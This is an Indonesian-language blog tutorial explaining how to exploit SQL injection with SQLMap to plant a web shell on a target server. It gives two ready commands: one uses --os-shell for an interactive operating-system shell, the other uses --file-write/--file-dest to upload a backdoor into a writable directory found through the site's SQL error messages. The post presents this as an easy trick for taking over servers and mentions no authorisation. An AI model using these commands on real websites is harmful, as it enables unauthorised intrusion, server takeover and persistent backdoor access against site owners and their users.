Home Exploit Hacking Linux Macos Python SQL Injection Tools Windows

Upload Shell With SQLMap

Pixel-Code
Pixel-Code
Updated: 0 min read
Table of Contents
Hallo sobat pixel kali ini gue mau bagiin trick gimana sih caranya upload shell with SQLMap. Lah emang iso kak? yaiso lah hehe, mungkin bagi kalian yang belum tau apa itu SQLMap, sedikit penjelasan SQLMap adalah alat uji penetrasi open source yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan injeksi SQL dan mengambil alih basis data server. Jadi sqlmap ini adalah tools yang dapat mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server. Wow! sangat powerful bukan, bagi kalian yang sering main-main dengan SQL-Injection hehe. Langsung simak stepnya yuk kak.

Pada tutorial kali ini saya menggunakan 2 cara yakni --os-shell & --file-write/file-dest:

- Menggunakan --os-shell:
sqlmap.py -u "http://urltarget.com/file.php?id=22" --dbs --os-shell
Kalian cukup tambahkan command --os-shell pada akhir command SQLMap kalian. Lalu kalian akan memilih opsi bahasa apa yang disupport oleh web server tersebut.

Disini kalian bisa pilih (default) ataupun tergantung pilihan kalian, jika sudah kalian cukup tekan ENTER.

Jika file sudah terupload, maka akan muncul shell interactive os-shell pada SQLMap kalian, Namun disini juga ada files uploader yang sudah disediakan oleh SQLMap untuk kalian untuk melakukan explorasi lebih lanjut.



- Menggunakan --file-write/file-dest:
sqlmap.py -u "http://urltarget.com/file.php?id=22" --dbs --file-write="path backdoor" --file-dest="path error sql and name backdoor" --batch

Penjelasan :
--file-write="path-backdoor" // Dimana kalian menyimpan path backdoor kalian.
--file-dest="path error sql and name backdoor" // Kalian memilih path yang writable untuk mengupload shell, kalian bisa memanfaatkan syntax error pada website untuk mengetahuinya.
Sebenarnya trik ini hampir sama dengan os-shell, Hanya saja perbedaanya yakni kalian memilih file uploader kalian dan mengupload shell pada directory yang dianggap kalian writable.

Tampilan Syntax Error pada Website.
Kalian pun bisa memanfaatkan syntax error pada website untuk mengetahui directory yang writable.

Jika file uploader kalian sudah terupload maka akan muncul info yang mengatakan bahwa file success written in DBMS maka success. 

Dan boom tampilan uploader yang saya upload.

Gimana cukup mudah bukan? Oke mungkin cukup sekian, Semoga bermanfaat and dont forget to share and see you next time byee~

Post a Comment

✔ Centang "Beritahu Saya" atau "Notify Me" untuk mendapatkan notifikasi balasan komentar via Email.